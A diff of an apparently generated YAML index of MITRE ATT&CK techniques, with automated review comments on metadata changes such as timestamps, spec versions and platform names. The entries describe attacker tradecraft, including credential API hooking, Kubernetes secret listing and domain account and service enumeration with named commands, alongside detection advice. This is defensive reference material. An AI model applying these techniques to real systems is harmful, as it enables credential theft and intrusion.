- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Elastic Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
- December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
- description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
- description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
- 12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
- description: Stack Exchange - Security. (2012, July 31). What are the methods
- to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-27T21:03:56.385Z'
name: 'Input Capture: Credential API Hooking'
description: |
Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
@@ -48508,28 +49162,94 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ created: '2020-02-11T19:01:15.930Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1056/004
+ external_id: T1056.004
+ - source_name: EyeofRa Detecting Hooking June 2017
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ - source_name: Zairon Hooking Dec 2006
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ - source_name: GMER Rootkits
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ url: http://www.gmer.net/
+ - source_name: MWRInfoSecurity Dynamic Hooking 2015
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ - source_name: Elastic Process Injection July 2017
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ - source_name: HighTech Bridge Inline Hooking Sept 2011
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ url: https://www.exploit-db.com/docs/17802.pdf
+ - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+ description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+ Retrieved December 18, 2017.
+ url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+ - source_name: Microsoft Hook Overview
+ description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Process Snapshot
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+ December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ - source_name: PreKageo Winhook Jul 2011
+ description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+ url: https://github.com/prekageo/winhook
+ - source_name: Jay GetHooks Sept 2011
+ description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+ 12, 2017.
+ url: https://github.com/jay/gethooks
+ - source_name: StackExchange Hooks Jul 2012
+ description: Stack Exchange - Security. (2012, July 31). What are the methods
+ to find hooked functions and APIs?. Retrieved December 12, 2017.
+ url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ - source_name: Adlice Software IAT Hooks Oct 2014
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ - source_name: Volatility Detecting Hooks Sept 2012
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1056.004
atomic_tests: []
T1552.007:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-15T16:25:28.820Z'
name: Kubernetes List Secrets
description: "Adversaries may gather credentials via APIs within a containers
environment. APIs in these environments, such as the Docker API and Kubernetes
@@ -48586,9 +49306,8 @@ credential-access:
url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.007
atomic_tests:
- name: List All Secrets
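Review bot: the `spec_version: '2.1'` key is dropped here (and in most of the following hunks) while `x_mitre_attack_spec_version` is bumped from 3.1.0 to 3.2.0; since this index is generated from upstream ATT&CK STIX, confirm that nothing downstream reads `spec_version` from the index, and otherwise call out the field removal alongside the spec-version bump in the change description.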
@@ -48677,7 +49396,7 @@ credential-access:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
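Review bot: the `modified` timestamp for Network Device Authentication moves backwards, from `'2022-05-11T14:00:00.188Z'` to `'2021-12-14T23:14:26.107Z'`, and the same regression appears for T1613, T1016.001, T1652, T1069.002, T1007 and T1120 further down. A newer upstream bundle should not yield older timestamps, so either the previous values were synthetic (every old value shares the identical `14:00:00.188Z` time component) or the generator picked an older object; the commit message should say which.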
@@ -48701,8 +49420,6 @@ credential-access:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
discovery:
T1033:
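Review bot: this entry loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` and nothing replaces them, whereas sibling hunks replace the 2.1.0 value with 3.2.0 or leave a 3.x value in place; T1016.001 below has the same gap. If the upstream object genuinely lacks the field, the generator should emit a consistent default rather than leaving some techniques without a spec version.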
@@ -48767,12 +49484,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1033
atomic_tests: []
T1613:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-15T16:08:50.706Z'
name: Container and Resource Discovery
description: "Adversaries may attempt to discover containers and other resources
that are available within a containers environment. Other resources may include
@@ -48831,7 +49547,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1613
atomic_tests:
- name: Docker Container and Resource Discovery
@@ -48920,7 +49635,7 @@ discovery:
- source_name: mitre-attack
external_id: T1016.001
url: https://attack.mitre.org/techniques/T1016/001
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-03-25T17:03:26.632Z'
name: 'System Network Configuration Discovery: Internet Connection Discovery'
description: |-
Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), tracert
, and GET requests to websites.
@@ -48941,13 +49656,11 @@ discovery:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1016.001
atomic_tests: []
T1069:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:03:06.294Z'
name: Permission Groups Discovery
description: |-
Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
@@ -48970,15 +49683,14 @@ discovery:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- x_mitre_version: '2.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Group: Group Metadata'
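Review bot: the platform list swaps `Azure AD`, `Office 365` and `Google Workspace` for `Office Suite` and `Identity Provider` (version 2.5 to 2.6), and T1069.003 below does the same; any index or filter keyed on the old platform names (per-platform CSV or Markdown indexes, platform selectors in tooling) must be regenerated in the same change or it will silently drop these techniques.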
@@ -49004,13 +49716,12 @@ discovery:
url: https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1069.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:51:35.759Z'
name: Cloud Groups
description: |-
Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
@@ -49035,12 +49746,11 @@ discovery:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -49082,13 +49792,12 @@ discovery:
url: https://github.com/True-Demon/raindance
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1615:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-01-06T12:41:08.579Z'
name: Group Policy Discovery
description: |-
Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\SYSVOL\\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
@@ -49149,12 +49858,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1615
atomic_tests: []
T1652:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:07:16.804Z'
name: Device Driver Discovery
description: |-
Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
@@ -49218,19 +49926,18 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1652
atomic_tests: []
T1087.002:
technique:
- modified: '2024-04-15T21:33:57.732Z'
+ modified: '2024-05-31T04:00:37.651Z'
name: 'Account Discovery: Domain Account'
description: "Adversaries may attempt to get a listing of domain accounts. This
information can help adversaries determine which domain accounts exist to
aid in follow-on behavior such as targeting specific accounts which possess
particular privileges.\n\nCommands such as net user /domain
and
net group /domain
of the [Net](https://attack.mitre.org/software/S0039)
- utility, dscacheutil -q group
on macOS, and ldapsearch
+ utility, dscacheutil -q group
on macOS, and ldapsearch
on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001)
cmdlets including Get-ADUser
and Get-ADGroupMember
may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle
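Review bot: the removed line `- utility, dscacheutil -q group` and the added line `+ utility, dscacheutil -q group` are identical as rendered, so this part of the hunk is a whitespace-only or invisible-character change; confirm it is intentional (for example a stripped trailing space or markup in the upstream description) rather than noise from the YAML dumper.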
@@ -49277,7 +49984,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1087.002
atomic_tests: []
T1087.001:
@@ -49344,12 +50050,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1087.001
atomic_tests: []
T1497.001:
technique:
- modified: '2024-04-19T12:49:40.919Z'
+ modified: '2024-09-12T15:50:18.047Z'
name: 'Virtualization/Sandbox Evasion: System Checks'
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
@@ -49439,18 +50144,17 @@ discovery:
url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1497.001
atomic_tests: []
T1069.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:16:47.754Z'
name: 'Permission Groups Discovery: Domain Groups'
description: |-
Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
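Review bot: the Deloitte Environment Awareness reference now carries an `/edit` suffix on the Google Drive URL and a new retrieval date of September 13, 2024; `/edit` links can prompt for edit permission or sign-in for readers who only have view access, so check that the link resolves anonymously and, if the upstream STIX carries it this way, consider keeping the plain `/file/d/<id>` form in the index. The same reference is updated identically in the T1497.003 block further down.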
@@ -49493,12 +50197,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1069.002
atomic_tests: []
T1007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-03T18:55:18.326Z'
name: System Service Discovery
description: |-
Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query
, tasklist /svc
, systemctl --type=service
, and net start
.
@@ -49539,12 +50242,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1007
atomic_tests: []
T1040:
technique:
- modified: '2024-04-19T12:32:44.370Z'
+ modified: '2024-10-15T15:11:55.217Z'
name: Network Sniffing
description: |-
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -49629,7 +50331,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1040
atomic_tests: []
T1135:
@@ -49691,12 +50392,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1135
atomic_tests: []
T1120:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:41.575Z'
name: Peripheral Device Discovery
description: 'Adversaries may attempt to gather information about attached peripheral
devices and components connected to a computer system.(Citation: Peripheral
@@ -49747,12 +50447,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1120
atomic_tests: []
T1082:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:42:22.247Z'
name: System Information Discovery
description: |-
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
@@ -49763,7 +50462,6 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Maril Vernon @shewhohacks
- Praetorian
@@ -49778,7 +50476,6 @@ discovery:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- IaaS
@@ -49826,7 +50523,8 @@ discovery:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1082
atomic_tests: []
T1016.002:
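Review bot: `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` are removed in the two preceding hunks and re-added here at a different position, so the net change for T1082 is only the spec version moving from 2.1.0 to 3.2.0 (with `spec_version: '2.1'` dropped); emitting keys in a stable, sorted order from the generator would make this a two-line diff instead of three hunks.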
@@ -49898,12 +50596,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1016.002
atomic_tests: []
T1010:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-15T16:22:56.372Z'
name: Application Window Discovery
description: |-
Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
@@ -49945,122 +50642,73 @@ discovery:
- source_name: Prevailion DarkWatchman 2021
description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
new evolution in fileless techniques. Retrieved January 10, 2022.'
- url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+ url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1010
atomic_tests: []
T1087.003:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
- type: attack-pattern
- created: '2020-02-21T21:08:33.237Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1087.003
- url: https://attack.mitre.org/techniques/T1087/003
- - source_name: Microsoft Exchange Address Lists
- url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
- description: Microsoft. (2020, February 7). Address lists in Exchange Server.
- Retrieved March 26, 2020.
- - source_name: Microsoft getglobaladdresslist
- url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
- description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
- 2019.
- - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
- Retrieved October 6, 2019.
- url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
- source_name: Black Hills Attacking Exchange MailSniper, 2016
- - source_name: Google Workspace Global Access List
- url: https://support.google.com/a/answer/166870?hl=en
- description: Google. (n.d.). Retrieved March 16, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-17T20:35:35.125Z'
name: Email Account
description: |-
Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
- In on-premises Exchange and Exchange Online, theGet-GlobalAddressList
PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+ In on-premises Exchange and Exchange Online, the Get-GlobalAddressList
PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_deprecated: false
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1497.003:
- technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Jorge Orchilles, SCYTHE
- - Ruben Dodge, @shotgunner101
- - Jeff Felling, Red Canary
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
type: attack-pattern
- created: '2020-03-06T21:11:11.225Z'
+ id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
+ created: '2020-02-21T21:08:33.237Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Revil Independence Day
- url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
- supply chain exploit to attack hundreds of businesses. Retrieved September
- 30, 2021.'
